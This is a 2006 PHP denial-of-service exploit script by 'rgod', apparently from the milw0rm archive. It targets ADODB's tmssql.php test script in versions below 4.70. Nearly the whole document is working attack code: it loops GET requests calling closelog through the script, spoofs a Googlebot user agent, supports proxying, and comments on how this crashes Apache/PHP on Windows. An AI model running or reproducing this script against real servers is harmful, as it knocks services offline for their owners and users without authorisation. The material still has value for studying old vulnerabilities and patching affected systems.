ADODB < 4.70 (tmssql.php) Denial of Service Vulnerability :

Date : 2006-04-09 Author : rgod
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ADODB tmssql.php Denial of service
";
echo "by rgod [email protected]
";
echo "site: http://retrogod.altervista.org

";

if ($argc<4) {
echo "Usage: php ".$argv[0]." host path redo OPTIONS
";
echo "host:      target server (ip/hostname)
";
echo "path:      path to ADODB
";
echo "redo:      how many times?
";
echo "Options:
";
echo "   -p[port]:    specify a port other than 80
";
echo "   -P[ip:port]: specify a proxy
";
echo "Examples:
";
echo "php ".$argv[0]." localhost /some_app/ 9999999
";
echo "php ".$argv[0]." localhost /some_app/ 9999999 -p81
";
echo "php ".$argv[0]." localhost /some_app/ 9999999 -P1.1.1.1:80
";
die;
}
/*
  tested against Apache/1.3.27 (Win32) PHP/4.3.3
  
  closelog() func close the connection to the system logger, but if its handle
  is never initialized, Windows exception is raised by the php4ts.dll
  module at address 0x00000000100bf014.
  By sending multiple requests to the tmssql.php script, which allow
  execution of an arbitrary function without arguments, this will cause
  the Apache process to crash and to consume a large amount of memory
*/

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="
"; $exa.="
";}
  }
 return $exa."
".$result;
}
$proxy_regex = '(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port."
";
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...
";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';
	}
  }
  fputs($ock,$packet);
  fclose($ock);
}

$host=$argv[1];$path=$argv[2];$redo=$argv[3];
$port=80;$proxy="";
for ($i=4; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

for ($i=1; $i<=$redo; $i++)
{
$packet ="GET ".$p."include/adodb/tests/tmssql.php?do=closelog HTTP/1.0
";
$packet.="User-Agent: Googlebot/2.1
";
$packet.="Host: ".$host."
";
$packet.="Connection: Close

";
sendpacketii($packet);
echo $packet;
}
?>

# milw0rm.com [2006-04-09]

C1

 

C2

 

C3